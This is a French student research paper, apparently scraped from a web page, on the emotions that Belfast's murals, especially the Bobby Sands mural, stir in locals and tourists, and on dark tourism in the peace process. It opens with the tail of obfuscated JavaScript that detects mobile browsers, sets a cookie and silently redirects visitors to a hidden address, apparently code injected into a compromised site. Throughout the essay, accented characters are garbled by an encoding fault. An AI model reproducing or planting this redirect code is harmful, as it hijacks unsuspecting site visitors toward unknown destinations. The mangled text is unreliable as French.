)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Belfast: murals, A�motions et processus de paix

CA�cile Walder, Celeste Tran, Chantal Vetter

ProblA�matique

Notre travail portera sur les A�motions que suscitent les murals chez leurs spectateurs, les Belfastois comme les touristes. Nous nous interrogerons plus particuliA?rement sur le(s) rA?le(s) donnA�(s) A� ces A�motions dans le processus de paix.

Ces murals ont A�tA� peints dans un contexte extrA?mement tendu, avec pour but da��intimider, de marquer le territoire, de commA�morer, en suscitant des A�motions chez les spectateurs (Crowley: 2011). Aujourda��hui, A� la suite du processus de paix entamA� dans les annA�es 90, le tourisme se dA�veloppe dans la ville, notamment autour de la��hA�ritage du conflit. Nous souhaitons observer la faA�on dont les A�motions des spectateurs sont mobilisA�es, voire instrumentalisA�es dans ce nouveau contexte, en prenant en compte da��une part la��apparition de nouveaux spectateurs, les touristes, et da��autre part les souvenirs que les habitants ont des Troubles et des A�vA?nements historiques de la��Irlande du Nord.

Notre question de recherche peut A?tre formulA�e de la faA�on suivante:

Comment les A�motions que provoquent les murals de Belfast auprA?s des spectateurs – Belfastois et touristes – sont-elles mobilisA�es dans le contexte du processus de paix?

MA�thodologie

Pour la mA�thode, nous avons adoptA� diffA�rentes approches, in primis la��entretien orientA� sous forme de micro-trottoir et la��analyse de discours.

Pour A�la rA�colte des donnA�es, le micro-trottoir a A�tA� choisi car il est rapide et permet ainsi da��approcher un grand nombre de personnes en peu de temps. Une liste de mots a A�tA� conA�ue pour faciliter les rA�ponses des interviewA�s. A�Ca��est une liste contenant une multitude de mots exprimant des sentiments. Les personnes ont dA� entourer les sentiments qua��elles ont A�prouvA�s face au mural. Cette mA�thode a permis de suggA�rer des sentiments, dont la nomination na��est pas forcA�ment facile. Cependant, il y a le risque da��induire un biais, A�tant donnA� que nous avons constituA� nous-mA?mes cette liste de mots. Afin de minimiser ce risque, nous avons mis un maximum da��A�motions, qui na��A�taient pas forcA�ment, A� notre avis, en lien avec les murals A�tudiA�s, et avons ajoutA� un espace blanc, oA? les personnes avaient la possibilitA� da��ajouter des sentiments manquants. Cette liste nous a permis A�galement de rapidement constater si les mA?mes A�motions avaient A�tA� sollicitA�es ou non.

Questionnaire
Liste de mots

Sur le terrain, nous avons dA�cidA� de nous concentrer sur une fresque seulement, celle de Bobby Sands. Les raisons de ce choix sont multiples: avant tout, il sa��agit da��un mural reprA�sentant un personnage emblA�matique de ce conflit. Il relA?ve donc da��une grande importance au sein de la��histoire belfastoise. Le fait que ce mural soit une attraction touristique connue A�tait un avantage car le lieu A�tait ainsi trA?s frA�quentA�. Il se trouve dans une rue de passage, fait qui a A�tA� A� la fois un dA�savantage puisque les gens avaient moins tendance A� sa��arrA?ter et A� mettre A� notre disposition leur temps, et A� la fois un avantage, puisque cela augmente le nombre des individus qui pouvaient A?tre interviewA�s. Les Belfastois A�tant ouverts A� la discussion, nous avons prA�parA� des questions complA�mentaires au micro-trottoir, afin da��approfondir les premiA?res pistes de rA�flexion que nous avions pu identifier. De cette maniA?re, nous avons pu les ajuster en fonction du contexte et diriger les rA�ponses en essayant da��en relever des A�lA�ments plus pertinents A� la nouvelle problA�matique.

Pour la rA�daction finale de notre travail, nous avons tout da��abord informatisA� les donnA�es rA�coltA�es afin da��en faciliter la lecture et la��analyse et nous aider A� en avoir une vision globale. Ensuite, nous avons utilisA� nos carnets de terrain. Les discussions avec les Belfastois ont enrichi les connaissances que nous avons pu acquA�rir lors des visites et des confA�rences auxquelles nous avons participA�. Nous nous sommes A�galement aidA�es des debriefings faits avec les autres A�tudiants qui avaient eux aussi des ressentis A� exprimer. Ces discussions nous ont permis de prendre en compte un maximum da��idA�es en rapport A� la problA�matique. Elles ont aussi crA�A� un cadre da��A�change mutuel de nos impressions, de nos doutes, etc.

Une approche des A�motions avec le mural de Bobby Sands

Les murals de Belfast ont plusieurs rA?les qui sont aujourda��hui rA�A�tudiA�s en raison de la campagne re-imaging Belfast. En effet, depuis le Good Friday Agreement de 1998, les autoritA�s essaient da��amA�liorer la��image de la ville. En ce qui concerne les murals, plusieurs ont A�tA� enlevA�s ou remplacA�s car ils reprA�sentaient des sujets violents ou des groupes paramilitaires illA�gaux. Or le tourisme profite de la��histoire des murals dans ses activitA�s et ce sont surtout les murals en lien direct avec le conflit qui sont intA�ressants pour les acteurs touristiques. Le rA?le des murals a donc changA� au cours du temps. Etant tout da��abord des marqueurs territoriaux et des appels au soutien de la communautA�, les murals ont aussi servi aux campagnes A�lectorales du Sinn FA�in en transmettant un message idA�ologique. Aujourda��hui, certains rappellent aussi des A�vA?nements historiques. A� If there is a significant historical moment to be recalled, or an important ideological message sent, a memory that needs to be fostered, information that has to be shared, a death that has to be commemorated, a cause that needs to be fought for a�� somewhere or other it will find expression on a wall, making an intervention in public space, demanding attention. A�A� (Crowley : 2011). Les murals ne sont pas lA� pour les touristes, mais avant tout pour la population locale. Ca��est lA� que les A�motions entrent en jeu : elles vont donner de la force aux images, leur donner un certain pouvoir. Lors de notre travail sur le terrain, nous avons identifiA� plusieurs rA?les dans lesquels les A�motions A�voquA�es par les murals sont importantes, que ce soit dans le tourisme ou dans les reprA�sentations qu’en a la collectivitA�. Notre recherche sur le terrain nous a montrA� que mA?me dans le contexte actuel de processus de paix, les murals suscitent encore des A�motions.

Lors de nos moments passA�s sur le terrain, nous nous sommes focalisA�es sur une peinture en particulier pour mener nos micros-trottoirs, celle de Bobby Sands. Ca��est un portrait du personnage souriant, entourA� de couleurs vives et de chaA�nes se brisant, portant le message a�?Everyone republican or otherwise has their own particular role to play a�� Our revenge will be the laugh of our childrena�?. Il se trouve sur Falls road et est peint sur la faA�ade de la��office du Sinn FA�in (parti politique rA�publicain, ayant eu des liens avec la��IRA). La figure de Bobby Sands est un des symboles fort de la lutte rA�publicaine. Il A�tait activiste et membre de la��IRA et est mort en prison aprA?s 66 jours de grA?ve de la faim. Pendant ses deux sA�jours en prison (entre 1972 et 1981) il sa��est mobilisA� pour protester contre le changement de statut des prisonniers politiques, qui, dA?s 1976, sont devenus des prisonniers de droit commun, et donc traitA�s de la mA?me faA�on que les criminels et dA�linquants. Avant de mourir, il sa��A�tait prA�sentA� pour A?tre A�lu membre du parlement et gagna les A�lections. Cependant, le gouvernement refusa de le laisser entrer en fonction (en raison de son statut de prisonnier).

Mural en mA�moire de Bobby Sands - Falls Road - 01.03.2016 - CA�cile Walder
Mural en mA�moire de Bobby Sands – Falls Road – 01.03.2016 – CA�cile Walder

Une premiA?re partie de ce travail sa��intA�ressera donc A� la mise en tourisme des murals et leur utilitA� A�conomique alors que la deuxiA?me partie se focalisera sur les murals en tant que biens communautaires et oeuvres collectives. Chaque partie sa��articule autour da��une mise en contexte et da��illustration et nous tenterons de faire des liens avec les donnA�es rA�coltA�es sur le terrain.

Tourisme des A�motions : enjeux autour des murals

Capitalisation des A�motions : les murals pris dans les rouages du dark tourism

Belfast voit arriver chaque annA�e plus de 9 millions de visiteursA�[1] et la ville investit beaucoup pour augmenter son attractivitA�. En 2012, les touristes ont dA�pensA� 416 millions de livres sterling [2] A� Belfast. GrA?ce A� la pacification, le secteur du A�tourisme est donc A� nouveau devenu une vA�ritable source de revenu pour la��A�conomie locale. Pour les chauffeurs de Black cabs, da��anciens prisonniers rA�publicains, ou encore les guides du Andy Tyrie Interpretative Centre, ca��est une rA�insertion professionnelle tout comme une faA�on de transmettre leur vision du conflit. La mise en avant de certains murals est une possibilitA� de rendre la ville A� nouveau plus attractive. Le mural de Bobby Sands, sur lequel portait notre questionnaire, est le mural le plus reproduit et marchandisA�.

Carte postale de Bobby Sands et Plan de Belfast et de ses murals, Chantal Vetter, 5.5.2016, GenA?ve
Carte postale de Bobby Sands et Plan de Belfast et de ses murals, Chantal Vetter, 5.5.2016, GenA?ve

Les murals font partie de la culture belfastoise mais ils sont de plus en plus instrumentalisA�s par les acteurs touristiques. A� Now figured as heritage and commodified in various forms a�� postcards, posters, books and guided taxi tours – the murals have become a source of revenue and profit for a number of organisations: ex-prisonersa�� associations, artistsa�� collectives, local community groups, and traditional commercial projects. A�A� (Crowley : 2011). Le mural de la��Easter Rising de 1916 A� Falls en est un bon exemple. Suite A� la discussion que nous avons eue avec le fils du propriA�taire du magasin de souvenirs sur lequel est peint le mural, nous avons compris qua��ils espA�raient attirer des touristes dans le quartier, notamment en vue du centenaire de la��Easter rising qui approchait. La raison da��A?tre principale du mural, sous prA�texte du centenaire, est aussi de nature lucrative. Le mural ayant un certain coA�t, il peut A?tre vu comme un investissement pour le prA�sent et le futur.

Mural en mA�moire de l'Easter rising - Falls Road - 03.03.2016 - CA�cile Walder
Mural en mA�moire de l’Easter rising – Falls Road – 03.03.2016 – CA�cile Walder

Les murals jouent ainsi de plus en plus un rA?le A�conomique. Ils sont inclus dans de nombreuses visites touristiques, en premier lieu les black cabs, mais les guides des Open bus city tours y font aussi rA�fA�rence. Une industrie du dark tourism sa��est dA�veloppA�e, oA? la��intA�rA?t est historique, mais A�galement sensationnel. On sa��intA�resse aux A�vA�nements douloureux des Troubles, et cette industrie joue beaucoup avec le thA?me de notre travail: les A�motions.

Le dark tourism est dA�fini par Fabrice Folio comme A�tant a�?une forme de visites associA�es A� la��affliction, aux tragA�dies et A� la dA�tresse sociale et A�conomiquea�? (Folio : 2015). Cette forme de tourisme est fondA�e sur le sensationnel et les A�motions fortes. Ca��est un processus qui capitalise les A�motions et en fait une source de revenu. Le fait, par exemple, que les guides touristiques soient des personnes qui ont vA�cu de prA?s le conflit rend la��expA�rience touristique plus a�?vraiea�? et a�?authentiquea�?.

Le dark tourism est aussi une faA�on de a�?mA�morialisera�? le passA� (Assayag, 2007), en rendant tangible la mA�moire des tragA�dies. En A�tant sur place, les touristes peuvent sa��imprA�gner des lieux et vivre une expA�rience sensorielle que na��offrent pas les manuels da��histoire. Il a un rA?le A�ducateur. A�

La��attitude des Irlandais du Nord face au dark tourism est plutA?t ouverte. Plusieurs personnes qui ont rA�pondu A� notre questionnaire se sont dits favorables A� la��expansion du tourisme dans leur ville. Stan les adorent: A� I love the tourists A�. Un homme de Derry [3] aime les murals pacifiques A� They keep tourism A�. Une femme de BroadwayA�[4] est plus pragmatique : A� I dona��t matter that tourists are coming. Ita��s part of it. A�. Cependant, des questions sa��A�lA?vent sur la faA�on de faire les prA�sentations touristiques et les souvenirs qua��en gardent les touristes. Comment sa��articulent les discours des acteurs touristiques?

Discours proposA�s aux touristes : quelle dimension idA�ologique?

Suite A� notre tour en black cabs, nous avons remarquA�, en parlant avec da��autres A�tudiants, que les tours proposA�s ne sont pas aussi personnels qua��ils paraissent A� premiA?re vue. Il y a une sorte da��accord sur les points A� mettre en valeur et les dA�tails A� accentuer. Ainsi, pratiquement tous les chauffeurs ont insistA� sur la jeunesse des victimes du conflit du cA?tA� rA�publicain et sur la mise en valeur de la part des loyalistes de Stevie Top gun [5], un homme qui aurait tuA� 43 catholiques. Notre chauffeur a A�galement soulevA� le fait que da��aprA?s lui, les murals loyalistes montrent la��amertume des protestants A� The protestant are bitter. They have a A�memorial mural for a killer A�A�[6].

Le discours peut donc A?tre remis dans un contexte plus large en tant que discours rA�publicain visant A� susciter la compassion et la rA�volte du touriste qui la��A�coute. Le discours vise clairement A� rallier le touriste A� la cause rA�publicaine. Quand ce na��est pas le mural qui crA�e des A�motions chez le touriste qui le regarde, ca��est bien le discours qui y est associA�. Les acteurs touristiques jouent donc un grand rA?le dans la maniA?re dont les touristes voient les murals, et surtout le conflit qua��ils reprA�sentent. Les auteurs de Feeling and Tourism studies confirment cet aspect: a�?It is in these places of ongoing political unrest that tourists, and tour guides, feel connections and divisions. In other words, emotions bind some touring bodies to nations and political allegiances, yet other bodies are marginalised.a�? (D.M. Budha: 2014, 111) Certains faits sont donc accentuA�s alors que da��autres tendent A� A?tre omis. (Les actions de la��IRA par exemple ne sont pratiquement pas mentionnA�es par les guides du cA?tA� rA�publicain.) Selon ces mA?mes auteurs, les guides touristiques prennent des rA?les politiques et vont plus loin en disant aux touristes ce qua��ils doivent penser ou ressentir. Avec la��exemple des guides touristiques de Jordanie, les auteurs soulignent le dA�sir da��amA�liorer la��image que les touristes ont des Arabes et de la��Islam et de rA�tablir leur dignitA�. (D.M. Budha: 2014, 101) Observons-nous le mA?me phA�nomA?ne A� Belfast, ca��est-A�-dire la volontA� da��exporter une meilleure image de soi? Et est-ce que les discours rencontrent un A�cho chez les touristes qui les A�coutent ? Les A�motions permettent-elles toujours de fA�dA�rer des personnes autour da��une cause ? En tout cas, elles amA?nent les personnes A� se positionner da��une certaine maniA?re face au conflit. Selon Bernard Julien, A� les jugements des individus, en fonction de leurs croyances et de leurs dA�sirs, occupent ici une position prA�pondA�rante dans la��A�motion A� (Julien: 2015). Or, dans notre discussion avec les reprA�sentants de la��office du tourisme de Belfast, il est ressorti que les discours divergents des acteurs touristiques sont un des problA?mes majeurs pour la ville. En effet, il y a une certaine concurrence entre les opA�rateurs touristiques nationalistes et loyalistes, chaque cA?tA� voulant donner sa vision du conflit. Une autre variable A� prendre en compte, comme le souligne une professeure da��une cinquantaine da��annA�e, est le manque de comprA�hension des touristes A� The problem is, they dona��t understand sectarianism. A� [7] Les connaissances prA�alables des touristes peuvent avoir un impact sur leur perception, mais aussi sur leurs A�motions. Un guide touristique israA�lien tA�moigne: selon leur background, les touristes sont plus ou moins choquA�s de ce qua��ils voient et entendent. (D.M. Budha: 2014, 110). Dans le contexte du dark tourism, le niveau da��information peut donc influencer la force des A�motions.

MA?me si nous na��avons pas pu faire des entretiens plus approfondis avec les touristes rencontrA�s A� Belfast, nous pouvons dire que leur expA�rience touristique est fortement liA�e A� leur ressenti A�motionnel.

Sentiments ambivalents : les touristes face au mural de Bobby Sands

Les donnA�es provenant des touristes [8] ne sont pas nombreuses : nous avons pu donner le questionnaire A� trois touristes des Pays-Bas (deux femmes et un homme de 52, 54 et 32 ans respectivement) ainsi qua��A� un couple britannique da��un cinquantaine da��annA�es. Ces derniers A�taient A�A� Belfast pour un jour.

Chose intA�ressante, une touriste nA�erlandaise sa��est distinguA�e en A�tant la seule A� avoir choisi toute une liste da��A�motions : alarmed, angry, annoied, concerned, hurt. Ces adjectifs plutA?t nA�gatifs vont avec sa remarque : A� young people getting killed sometimes for no reason A�. Ses deux accompagnateurs ont eux aussi chacun eu un choix solitaire : suspicious et enraged, mA?me sa��ils se considA?rent plutA?t neutres.

Les touristes journaliers britanniques soulignent la tristesse que soulA?vent les morts et le soulagement que ce soit du passA�. A� Part sadness that ita��s here because of the Troubles, fighting and deaths etc… Part relief thata��s now history, we can remember and learn form the conflict and the waste of lives and suffering and to try to respect other views, cultures and religions in the future A�. Pour rA�sumer, les deux ont choisi entre autres free et grief.

On observe que malgrA� la distance existante avec le conflit (aucune des personnes mentionnA�es ci-dessus na��a vA�cu les A�vA?nements sur place), ces visiteurs ont ressenti quelque chose en voyant la peinture de Bobby Sands. Ces A�motions sont mA?me plutA?t fortes, voire engagA�es. Cette image a donc un pouvoir mobilisateur. Nous pouvons affirmer qua��il existe une sorte de lien A�motionnel entre les touristes et les murals. Qua��en est-il des Belfastois eux-mA?mes? Que reprA�sentent les murals pour eux aujourda��hui?

Les Belfastois et a�?leursa�? murals

Quel est le rA?le des murals pour les Belfastois ?

Le rA?le premier des murals A�tait da��A?tre vu par la communautA� elle-mA?me. Dans le documentaire Art of Conflict, Bill Rolston, sociologue A� la��universitA� de Queens A� Belfast et spA�cialiste des murals, explique : A� The most important thing I would say about them thata��s interesting is that most of these murals are in the heart of communities, the heart of working class communities. So their message is not to the outside world, not even to the tourists who come out in the thousands. But theya��re message to these communities. a�?Are you with us? Are you against us? Are you in agreement with where we stand?a�? This is the community voice. A� (Art of Conflict, 2012). Les murals ont donc une fonction de perpA�tuation des valeurs communautaires. Cet aspect des murals a A�tA� soulignA� par plusieurs de nos interlocuteurs : il est important de garder le passA� pour les gA�nA�rations da��aprA?s pour qua��elles puissent regarder et connaA�tre la��histoire.A� Ita��s part of our history A� (mA?re (45) et fille (18) de Broadway) [9]. Les A�motions qua��ils suscitent chez la population locale ont pour but de leur rappeler la cause de leur lutte, la cause du conflit. Ils prA�sentent la A� lutte telle que la perA�oivent les RA�publicains A� (Maillot : 1997). Ils sont comme un rappel quotidien. David Ervine, un peintre muraliste, les compare A� un crieur public A� Theya��re like a town crier A�. (Art of Conflict, 2012). Les murals font partie de la vie de tous les jours : plus leur message se rA�pA?te, plus leur affirmation gagne en force. Le mural a un impact tant qua��il est lA�, une fois enlevA� il ne reste que dans les mA�moires et perd sa force de rA�pA�tition. A� Whatever you can say about these murals, you cannot accuse them of being apathetic. These are politically strong statements. The are communities saying, a�?Look, this is what wea��ve gone through, this is what we believe, this is what we want.a�? And so theya��re very, very powerful images. A� (Bill Rolston, Art of conflict) Certains murals rA�publicains ont A�tA� A�rigA�s en soutien A� la��IRA et ses activitA�s. La��IRA, comme tout groupe paramilitaire, avait besoin du soutien moral de sa communautA� pour exister et lA�gitimer cette existence. Les murals ont donc une double A� fonction didactique A� : ce sont des instruments de propagande et da��A�ducation (Maillot : 1997). Ils sont aussi instrumentalisA�s par les acteurs politiques. En A�vitant A� la multiplication des graffitis A�, les murals permettent au A� Sinn FA�in de contrA?ler ce qui se dit/lit sur les murs rA�publicains, et da��assurer une mainmise idA�ologique sur le quartier A�. (Maillot : 1997). Les A�motions qua��ils A�voquent sont donc trA?s importantes pour avoir un impact maximal dans la pensA�e des individus. Les rA�publicains ont choisi de prendre la voie du romantisme, en reprA�sentant des hA�ros issus de leur communautA�, avec comme figure de proue Bobby Sands.

Point de vue divergents face au mural de Bobby Sands

Les A�motions suscitA�es par les murals rA�publicains sa��inscrivent principalement dans une logique da��hA�roA?sation et de romantisme, comme on peut la��observer pour la fresque de Bobby Sands. En effet, selon Maillot, A� les grA?ves de la faim donnent A� la lutte une dimension humaine, permettant aux rA�publicains de contrer la propagande officielle visant A� prA�senter les Volontaires de la��IRA comme des psychopathes et des terroristes (…) Bobby Sands devient vite le prototype du hA�ros rA�publicain, dA�vouA� A� sa cause, victime de la��injustice de tout un systA?me. Depuis 1916, ca��est la premiA?re fois que les rA�publicains peuvent mettre en avant le sacrifice de la��un des leurs aux mains des oppresseurs. Les A�vA?nements aidant, Bobby Sands allait devenir une lA�gende (…) La��effigie de Bobby Sands devient le symbole numA�ro un de la rA�sistance. A� (Maillot : 1997)

Les rA�ponses dans nos questionnaires confirment cet aspect : la population locale est trA?s touchA�e par la grA?ve de la faim de Sands et le conserve en souvenir en tant que hA�ros. Les termes hA�ros ou lA�gende reviennent souvent et sont associA�s A� la fiertA�. Une femme de 41 ans, habitante de Falls Road [10] A�crit : A� Bobby Sands died a horrible death for us. I think this is beautiful. Hea��s my hero A�. Robert, du bureau du Sinn FA�in, dit que le mural est A� an inspiration for people who see it, especially irish republicans who continue Bobby Sands struggle for irish freedom and independance. He is my hero A�. Une femme de Broadway, 45 ans [11], A�crit : A� Hea��s a legend A�. Les personnes qui se souviennent de Bobby Sands comme un hA�ros sont de la mA?me gA�nA�ration, tous autour de la quarantaine.

Bobby Sands est identifiA� A� un symbole de la lutte pour la libertA� et la��indA�pendance. A�Bill Rolston rA�sume : A�Republicans obviously regard Bobby Sands as the prototypical hero, the man who stood to the might of Britain and used the ultimate weapon, the weapon that they could not take away from him, which was his own life A� (Art of conflict, 2012). Da��autres personnes se sont ajoutA�es A� liste des martyres rA�publicains et des murals sont peints en leur mA�moire. Un sexagA�naire du quartier de Ballymurphy [12] oA? se situe un mural reprA�sentant trois volontaires de la��IRA pense que reprA�senter les personnes du quartier est la��atout principal des murals. A� It reflects people. A�[13]A�Ces portraits ont donc pour but da��A�voquer des A�motions positives telles la��admiration, la fiertA�, le respect face A� ces personnes, parfois presque sanctifiA�es.

La version plus romantique du cA?tA� catholique avec la prA�sence de nombreux hA�ros, prA�sentA�s en martyrs de la cause rA�publicaine, est moins menaA�ante que les gunman reprA�sentA�s par les murals loyalistes. Selon Naomi Doak, les murals rA�publicains attirent plus de sympathie justement grA?ce A� la valorisation du passA� romantico-celtique. (Notes du carnet de terrain)

Bien que nous observions la��hA�roA?sation de Bobby Sands par la communautA� locale, nous avons rencontrA� des personnes critiques envers cette tendance. Une A�tudiante protestante de la Queens University [14] pense que la reproduction et la sur-reprA�sentation de ce mural va A� la��encontre du processus de paix et du lissage des tensions, en rappelant la��engagement controversA� du personnage.[15] Une Belfastoise da��une cinquantaine da��annA�e rencontrA�e devant ledit mural a elle aussi exprimA� son scepticisme. Selon elle, Bobby Sands est A� idA�alisA� A�. Les personnes lui attribueraient des qualitA�s posthumes, comme A� par exemple le fait qua��il soit un poA?te A�. Elle exprime A�galement la��opinion qua��il na��aurait A� pas A�tA� assez cultivA� pour faire de la politique A�. Cette femme se sent aliA�nA�e face au mural, car il ne permet pas de A� construire les ponts vers le futur et le 21A?me siA?cle A�. Elle veut A?tre A� neutre, aller de la��avant tout en respectant le passA� A�.

Ces deux personnes viennent du milieu acadA�mique, la��une A�tant A�tudiante A� la��universitA� de Queens, et la��autre A�tant professeure. Les autres professeurs que nous avons rencontrA�s lors de notre visite A� la��UniversitA� de Queens semblaient eux aussi trA?s dA�tachA�s du conflit et le considA�raient da��une faA�on distanciA�e. Est-ce donc le milieu de la��A�ducation supA�rieure qui amA?ne les individus A� prendre du recul? A�

Pratiquement tous les Belfastois rA�publicains interrogA�s expriment un certain attachement aux mural de Bobby Sands, et surtout les rA�sidents de Falls Road. Une catA�gorie particuliA?re des habitants de Belfast sont les peintres muralistes, les auteurs des murals.

Peintres et murals: expression da��A�motions personnelles ou collectives?

Quels sont les sentiments du peintre lui-mA?me face A� A� son A� mural ? Nous avons rencontrA� Danny Devenny un peu par hasard le jeudi matin, pendant notre deuxiA?me moment de terrain, alors qua��il avait rendez-vous avec un autre groupe da��A�tudiants. Il est probablement le peintre muraliste le plus connu de la��Irlande du Nord. Il est la��auteur da��une grande partie des murals de Falls et sa��engage fortement pour le processus de paix A� sa maniA?re, ca��est-A�-dire en peignant des murals avec un artiste loyaliste, Mark Ervine (le fils de Bob Ervine qui A�tait un des premiers peacemaker de la��Irlande du Nord). A travers la courte discussion que nous avons eue avec lui ce jeudi matin et ses propos dans le documentaire Art of Conflict, nous avons constatA� que les peintres muralistes ne reprA�sentent pas seulement les sentiments de la communautA�, ils se dA�finissent eux-mA?mes comme militants politiques et ont souvent des liens trA?s personnels envers le mural ou le sujet du mural.

Dans Art of Conflict, Danny Devenny parle de son rA?le de soutien communautaire A� la��IRA et au Sinn FA�in. A� Elles (les peintures murales) expriment le soutien pour la��IRA, pour les rA�publicains en gA�nA�ral, elles revendiquent des droits sociaux, ou bien le droit pour le Sinn FA�in A� A?tre intA�grA� dans les discussions concernant la��avenir de la��Irlande du Nord. A� (Maillot : 1997). Ces propos reprennent la��idA�e de la transmission des valeurs communautaires A� la��interne comme A� la��externe du quartier en ce qui concerne les enjeux politiques de la��Irlande du Nord. Les artistes, dont Devenny, ne se considA?rent pas comme tels (ils na��ont da��ailleurs que rarement suivi une formation artistique) mais se voient comme des militants politiques qui, grA?ce A� leur peinture, exprime A� une rA�action par rapport au quotidien A�. (Maillot : 1997) A� On ne fait pas de la��art pour la��art, mais on peint pour rA�agir face aux A�vA?nements. On fait un travail pour le Sinn FA�in, pour la��IRA, pour le mouvement rA�publicain, au mA?me titre que le militant politique ou le Volontaire de la��IRA. A� Et A� Devenny da��ajouter A� I see myself as a political activist.a�? (Art of Conflict, 2012). Les tA�moignages de deux peintres muralistes loyalistes font le lien entre les sentiments communautaires et les sentiments personnels des peintres. A� Ia��ve never regretted any of my work, you know, cause at the time it was the feelings. It was representing my feelings and the community feelings through the art. A�A� David Craig, un autre peintre muraliste loyaliste, parle de fiertA�: A� I get a sense of pride out of it. You know, people came and asked me to basically represent their feelings and basically my own feelings as well, to put it on a wall, in a picture.A� (Art of Conflict, 2012)

Danny Devenny connaissait personnellement Bobby Sands. Pour lui, ce mural est da��abord peint en sa mA�moire. Dans la��interview qua��il donne dans le documentaire Art of Conflict, il parle aussi des A�motions que ce mural dA�clenche chez les loyalistes. A� I knew Bobby very well. He was just a lovely person. What really inspired me about him was: he was just so full of energy about everything. Ita��s funny a�� the smiling face of Bobby Sands on the Falls road mural – I always thought it was funny. Thata��s kind of interesting to me, you know, there are other murals there, where youa��d find the British soldiers and the RUC. They seem to hate that mural more than anything else. In fact, hours later I completed the mural the first time, RUC personals in jeeps came along and threw paint at it. But I guess of the smiling face, you know. Ita��s Bobbya��s own philosophy: a�? Our revenge will be the laughter of our childrena�?. And they cana��t handle that. They cana��t handle that this confident young man gave his life for this cause. A� (Art of Conflict, 2012) A�

Lors de notre rencontre, Devenny en a profitA� pour nous montrer un dA�tail du mural de Bobby Sands, le joueur da��accordA�on qui est reprA�sentA� en bas A� droite. En fait, il sa��agit da��une peinture de Jef AA�rosol, street-artist franA�ais, qui, une nuit, la��a peinte en cachette. Selon Devenny, ce na��est pas une marque de non-respect, mais la��hommage da��un musicien pour un artiste. (En effet, les RA�publicains se souviennent de Bobby Sands comme un poA?te car il a A�crit plusieurs poA?mes en prison.) Devenny pense que Sands aurait sA�rement aimA� cette philosophie et, en accord avec la communautA� de Falls, la dA�cision a A�A�tA� prise de laisser le joueur da��accordA�on et Devenny a ajoutA� des paroles de chanson au-dessus. Cette petite anecdote montre la notoriA�tA� de Bobby Sands A� travers le monde et le respect que lui vouent les artistes, mais aussi le fait que cette oeuvre appartient A� la communautA�.

DA�tail ajoutA� par le street artist Jef Aerosol sur le mural de Bobby Sands - Falls Road - 01.03.2016 - CA�cile Walder
DA�tail ajoutA� par le street artist Jef Aerosol sur le mural de Bobby Sands – Falls Road – 01.03.2016 – CA�cile Walder

 

Quel avenir pour les murals et le tourisme des A�motions ?

La��approche par les A�motions a rA�vA�lA� des logiques trA?s diffA�rentes selon les groupes qui nous en parlaient. La��hA�roA?sation et la mise en avant de valeurs A� la��intA�rieur de la communautA� permettent la transmission de la culture rA�publicaine. Or, ces idA�es sont actuellement aussi exportA�es A� travers le tourisme. Ca��est ici un grand dA�fi pour les autoritA�s car il sa��agit de garantir une comprA�hension plus objective de la��histoire du conflit en Irlande du Nord A� travers les supports touristiques. Les murals sont perA�us comme un hA�ritage, mais aussi comme un obstacle pour le futur. Suite A� ces remarques, plusieurs pistes de rA�flexion sa��ouvrent A� nous.

Une des pistes de rA�flexion qui expliquerait la pA�rennitA� des murals est le besoin pour les communautA�s de donner sens A� ce qui sa��est passA�, A� lA�gitimer les pertes, les sacrifices, mais A�galement les actes de violence qui ont A�tA� perpA�trA�s. Si, du jour au lendemain, tous les murals sont enlevA�s, quel message est envoyA� aux populations qui ont A�tA� les plus actives durant la pA�riode des Troubles? Est-ce qua��on ne leur enlA?ve pas A�galement une forme da��expression qui lA�gitime leur histoire?

Dans un sens, ces murals sont un soutien moral aux acteurs du conflit, qui na��ont plus besoin da��A?tre encouragA�s pour se rallier A� la cause, mais da��A?tre soutenus pour continuer A� vivre avec eux-mA?mes et avec les actes qua��ils ont commis (ou subis).

Cependant, ce procA�dA� a pour consA�quence d’encourager la haine de la��autre. Tant qua��ils sont lA�, les murals rappellent au quotidien le conflit et les animositA�s entre les deux communautA�s. Leur prA�sence entrave-t-elle le processus de paix? Les murals sont aussi dA�finis comme hA�ritage culturel. Or, A� quel point des marques de conflit peuvent-elles devenir un hA�ritage culturel? Un hA�ritage culturel na��est jamais neutre. Ce dilemme na��est pas seulement prA�sent pour les locaux mais sa��accentue da��autant plus avec la��ouverture de Belfast et la��avA?nement du tourisme. Les touristes sont en gA�nA�ral A� la recherche da��A�motions, que ce soit dans le tourisme da��aventure, le tourisme de wellness ou le dark tourism (D.M. Budha: 2014). Les auteurs de Feeling and tourism studiesA�appellent A� prendre davantage en compte les A�motions dans les A�tudes sur le tourisme. a�?Our call for an emotional turn in tourism – a�?emotional tourisma�? or a�?tourism of emotionsa�? – recognize the need to consider embodied emotions as socially and culturally constructed and should not be ignored in tourism studies.a�? (D.M. Budha: 2014, 111). Ces sentiments da��opposition et les diffA�rents points de vue du conflit sont transmis par les acteurs touristiques. Pourquoi les acteurs touristiques A�voquent-ils aujourda��hui encore ces A�motions dans leurs discours et pourquoi en susciter chez les touristes prA�cisA�ment? Est-ce, comme dit plus haut, une maniA?re de se lA�gitimer face A� la communautA� internationale, afin da��A?tre mieux compris ? Est-ce par peur da��A?tre oubliA�s, face aux nombreuses crises A�conomiques, politiques et migratoires du moment?

Il reste A�galement le problA?me de savoir quelles sont les connaissances prA�alables des visiteurs. La ville doit trouver un moyen de les a�?mettre A� niveaua�? leurs connaissances mais aussi da��harmoniser les rA�cits. Pour rA�ellement pouvoir donner la��image da��une ville en processus de paix alors que le dark tourism et le danger-zone tourism (Buda et al. : 2014) sa��A�tendent davantage, le dA�fi que vont devoir relever les autoritA�s est de crA�er des fondements communs entre les diffA�rents acteurs touristiques, comme la��a soulignA� Naomi Doaks lors de la confA�rence sur le tourisme A� Belfast. [16]

